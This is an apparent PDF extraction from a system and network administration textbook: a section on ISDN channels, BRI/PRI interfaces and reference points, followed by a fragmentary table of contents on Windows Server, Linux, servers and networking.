System & Network Administration ISDN is actually a set of communication protocols proposed by telephone companies that allows them to carry a group of digital services that simultaneously convey data, text, voice, music, graphics, and video to end users, and it was designed to achieve this over the telephone systems already in place.
16.1.1 B channel
Bearer channels (B channels) are used to transport data. B channels are called bearer channels because they bear the burden of transporting the data. B channels operate at speeds of up to 64 kbps.
16.1.2 D channel
D channels are used for signaling. They are used to establish the session before the data is actually transfer.
16.2.1 BRI: ISDN Basic Rate Interface (BRI, also known as 2B+1D) service provides two B
channels and one D channel. The BRI B-channel service operates at 64Kbps and carries data, while the BRI D-channel service operates at 16Kbps and usually carries control and signaling information.
16.2.2 PRI: According to American standards , the ISDN Primary Rate Interface (PRI, also
known as 23B+D1) service delivers 23 64Kbps B channels and one 64Kbps D channel for a total bit rate of up to 1.544Mbps. And according to European standards, ISDN provides 30 64Kbps B channels and one 64Kbps D channel for a total bit rate of up to 2.048Mbps.
Figure 16.1 Router A is ordered with an ISDN BRI U reference point, referring to the I.430 reference point defining the interface between the customer premises and the ISP. Router B is bought with an ISDN BRI S/T interface, implying that it must be cabled to a function group NT1 device. An NT1 function group device must be connected to the ISP line through a U reference point; the S/T interface defines the connection to Router B. Router B is called a TE1 (Terminal Equipment 1) function group device. Non-ISDN equipment is called a TE2 (Terminal Equipment 2) device and is attached using the R reference point to a terminal adapter (TA) function group device. Alternatively, a TE1 can connect using an S reference point to an NT2 function group,
104
Table of Contents
1. Introduction to Microsoft Server 1
1.3 Hardware Requirement ........................................................................................................................5 1.4 Windows Server 2008 Editions - Features ....................................................................................6
1.4.1 New and Updated Features in Windows Server 2008 ................................................................ 6
1.5 Edition Comparison by Server Role ................................................................................................7 1.6 Edition Comparison by Server Core Installation Option ........................................................8
105
2.7 Group Policy .......................................................................................................................................... 19 2.8 Sites ........................................................................................................................................................... 19 2.9 Domains................................................................................................................................................... 19 2.10 Organizational units (OUs) ............................................................................................................ 19
2.10.1 Delegating Group Policy Administration .................................................................................... 20
2.13 Domain Functional Levels .............................................................................................................. 22 2.14 Forest Functional Levels ................................................................................................................. 23 2.15 Read-Only Domain Controllers ................................................................................................... 23
3. SERVERS 24
3.1 Dynamic Host Configuration Protocol (DHCP) ....................................................................... 24 3.2 Scopes ...................................................................................................................................................... 25 3.3 Domain Name System ....................................................................................................................... 25
3.3.1 Zones ........................................................................................................................................................ 25 3.3.2 Zone Types.............................................................................................................................................. 25 3.3.3 Zone Files ................................................................................................................................................ 26 3.3.4 Zone Resource Records ...................................................................................................................... 26 3.3.5 Dynamic Update.................................................................................................................................... 27
3.5 Hypertext Transfer Protocol Secure (HTTPS) ........................................................................... 29 3.6 File Transfer Protocol ......................................................................................................................... 30
106
4.1 Salient Features of LINUX................................................................................................................. 40 4.2 Advantages of Linux ........................................................................................................................ 43 4.3 LINUX INSTALLATION ........................................................................................................................ 44
4.3.1 Types of installation Method ............................................................................................................ 45 4.3.2 Types of Boot loader............................................................................................................................ 45
4.4 Hard Disk Partitioning Method ...................................................................................................... 45 4.5 Type of X-Window System (Desktop) ...................................................................................... 45
5. LINUX KERNEL & SHELL 45
5.3 Linux Utilities and Application Program .................................................................................... 46 5.4 LINUX SUPPORTED FILE SYSTEMS ............................................................................................... 46
5.4.1 MS-DOS, VFAT, and UMSDOS .......................................................................................................... 46 5.4.2 ISO 9660 CDROM ................................................................................................................................. 47 5.4.3 Minix.......................................................................................................................................................... 47 5.4.4 NTFS .......................................................................................................................................................... 47 5.4.5 OS/2 HPFS ............................................................................................................................................... 47 5.4.6 /proc.......................................................................................................................................................... 47 5.4.7 /dev/pts.................................................................................................................................................... 47 5.4.8 ROM .......................................................................................................................................................... 47 5.4.9 Second Extended (ext2) ...................................................................................................................... 47 5.4.10 Third Extended (ext3) ........................................................................................................................ 47 5.4.11 NFS .......................................................................................................................................................... 47 5.4.12 SMB ......................................................................................................................................................... 47 5.4.13 NCP ......................................................................................................................................................... 47
107
7.1 Web Browsers ....................................................................................................................................... 54 7.2 Mail Clients ............................................................................................................................................. 54 7.3 Office Application ................................................................................................................................ 54 7.4 GUI Editors .............................................................................................................................................. 54
8. LINUX NETWORKING 56
10.1 Types of Firewall ................................................................................................................................ 59 10.2 Iptables & netfilter............................................................................................................................ 59 10.3 Iptables syntax and commands .................................................................................................. 60
11. SERVERS 61
11.5 NFS Server & client .......................................................................................................................... 66 11.6 Samba Server ...................................................................................................................................... 67
11.6.1 These are the four Samba RPM packages that you need ..................................................... 68 11.6.2 Service Profile: Samba ....................................................................................................................... 68 11.6.3 SAMBA SERVER ................................................................................................................................... 68 11.6.4 SAMBA SERVER SHAREING PRINTER, FILE & DIRECTORY .................................................... 69 12. INTRODUCTION TO NETWORKING 70
12.1 Definition .............................................................................................................................................. 70 12.2 A network consists of a .................................................................................................................. 70 12.3 Requirement of Networking ......................................................................................................... 70
108
13.2 Private IP ............................................................................................................................................... 78 13.3 MASKING .............................................................................................................................................. 78 13. 4 SUBNETTING ...................................................................................................................................... 78 13.5 Some terminologies those are used with networking models ...................................... 79
13.5.1 Collision Domain................................................................................................................................. 79 13.5.2 Broadcast Domain .............................................................................................................................. 79 13.5.3 MAC ........................................................................................................................................................ 79 13.5.4 Burned-in address .............................................................................................................................. 79 13.5.5 Unicast address ................................................................................................................................... 79
109
16.3 ISDN Function Groups and Reference Points .................................................................... 103 16.4 Function Groups ............................................................................................................................. 104
110